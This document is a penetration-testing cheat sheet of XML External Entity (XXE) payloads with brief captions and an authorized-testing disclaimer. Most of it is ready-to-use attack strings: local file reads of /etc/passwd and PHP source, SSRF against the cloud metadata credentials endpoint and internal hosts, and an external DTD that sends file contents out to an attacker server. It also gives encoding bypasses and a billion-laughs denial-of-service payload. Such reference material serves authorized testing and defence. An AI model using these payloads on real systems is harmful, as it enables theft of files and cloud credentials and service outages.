XXE (XML External Entity) Cheat Sheet
XML External Entity payloads for file read, SSRF, blind out-of-band exfiltration, and denial of service on authorized targets.
Overview
XXE abuses XML parsers that resolve external entities. If an endpoint accepts XML (SOAP, SAML, file uploads, REST with Content-Type: application/xml), you can define an external entity to read local files, reach internal services (SSRF), or exfiltrate data out-of-band when output isn't reflected. Always test by injecting a DOCTYPE with a custom entity.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Detect & read a local file
Classic file read — replace a reflected value with &xxe;
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>Windows target file
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>Base64 wrapper to read PHP source (avoids parse errors)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>SSRF via XXE
Hit the cloud metadata endpoint
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]>Reach an internal-only service
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.0.0.5:8080/internal">]>Blind / out-of-band (OOB)
External DTD hosted on your server (evil.dtd)
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://10.10.14.5/?x=%file;'>">%eval;%exfil;In-band stub that pulls the malicious DTD
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.5/evil.dtd"> %xxe;]><root>x</root>Confirm OOB with a simple callback first
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.5/ping"> %xxe;]>Variations & bypasses
Switch encoding to bypass naive keyword filters
<?xml version="1.0" encoding="UTF-16"?>SVG upload XXE (image parsers often resolve entities)
<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><svg>&xxe;</svg>SOAP request injection point
<soap:Body>...<!DOCTYPE ...>...&xxe;...</soap:Body>If errors are verbose, error-based XXE can leak file contents in the error message
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>Billion laughs (DoS — lab only)
Entity expansion DoS
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">...]>Destructive — only in an authorized, isolated lab.
Tips
- If the value isn't reflected, go out-of-band: host an external DTD and exfiltrate to your server.
- Use php://filter base64 when reading files that would otherwise break XML parsing.
- Try changing Content-Type to application/xml on JSON endpoints — some parsers accept both.
- Fix = disable DOCTYPE/external entity resolution in the XML parser (note in your report).